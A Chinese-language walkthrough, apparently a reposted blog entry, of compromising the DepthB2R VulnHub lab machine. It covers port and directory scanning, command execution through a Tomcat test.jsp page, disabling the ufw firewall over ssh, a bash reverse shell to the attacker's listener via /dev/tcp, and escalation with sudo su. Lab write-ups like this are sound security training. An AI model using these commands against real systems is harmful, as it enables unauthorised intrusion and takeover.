欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

DepthB2R 打靶机打靶记录

最编程 2024-10-08 20:05:49
...

一、靶机介绍

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

二、信息收集

根据靶机主页显示,确认靶机ip为192.168.242.132

端口扫描

nmap -p- -A 192.168.242.132

发现只开放了8080端口

用dirsearch扫个目录

apt-get update
apt-get install dirsearch
dirsearch -u http://192.168.242.132:8080

探测出 /manager,/manager/html ,/test.jsp

尝试访问看看,应该是个tomcat搭建的网站

尝试看看刚个功能点,这里有四个跳转链接除了这个manager webapp,其他都是404,进去看下url也就是之前探测出的目录

试一下默认密码,登陆失败

去test.jsp目录看看

按照他说的输入 ls -l /tmp

这里暴露出俩个用户 root 和 tomcat8

既然可以执行命令,那有可能存在命令执行,看看根目录,家目录试试

ls -al /
ls -al /home

发现确实存在命令执行

三、Getshell

既然存在命令执行,那就直接反弹shell试试,经过一顿操作发现反弹shell失败,查看进程,发现有ssh,之前没有扫到,可能是因为防火墙

ps aux
#参数'aux' 会打印系统中所有正在运行的进程

确实有ssh开启,但是之前端口扫描没扫到

查看/etc,防火墙是开启状态

ls -al /etc

尝试关闭防火墙

ssh bill@localhost sudo ufw disable

再次尝试反弹shell

这边kali先起一个监听

nc -lvvp 9999

命令执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.242.128/9999 0>&1 

这里成功收到监听,成功getshell

四、权限提升

先 sudo -l 看看有哪些操作可以使用root权限

发现所有操作都可以执行root权限

sudo su

提权成功